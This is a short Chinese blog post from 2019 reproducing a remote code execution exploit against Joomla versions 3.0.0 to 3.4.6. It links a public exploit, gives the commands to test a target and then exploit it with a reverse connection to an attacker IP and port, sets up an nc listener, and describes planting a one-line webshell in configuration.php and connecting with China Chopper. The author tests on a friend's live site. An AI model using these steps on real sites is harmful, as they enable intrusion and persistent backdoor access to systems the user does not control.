Joomla 3.0.0 --> 3.4.6-RCE复现

Joomla是一款网站管理系统CMS,最近曝出其3.00-3.4.6的joomla版本存在一个RCE漏洞。

并且大佬已将exp放在了github上,下载地址:https://www.exploit-db.com/exploits/47465

该exp是用python3写的

环境的话,可以自己在服务器或者本机上搭建一个joomla对应的版本,网上很多教程。

我这里直接使用一个朋友的站来做实验,我们先用这个python文件验证是否存在该漏洞:

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/

 

 

 

 像这样最后显示use --exploit to exploit it 就说明此站点存在这个rce漏洞

然后利用exp的命令:

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/ --exploit --lhost 192.168.1.120 --lport 9000 //用于监听的公网ip和一个不占用的端口

 

 然后用公网的vps通过nc来监听9000端口:

nc -lvvp 9000

 之后再运行exp的命令,将自动写入一句话木马到根目录下面的configuration.php文件里面:

 出现如上图所示的字符串即是一句话木马的随机密码。

然后菜刀连接

 

 最后成功getshell。

 

posted @ 2019-10-09 18:44  ctrl_TT豆  阅读(839)  评论(0编辑  收藏  举报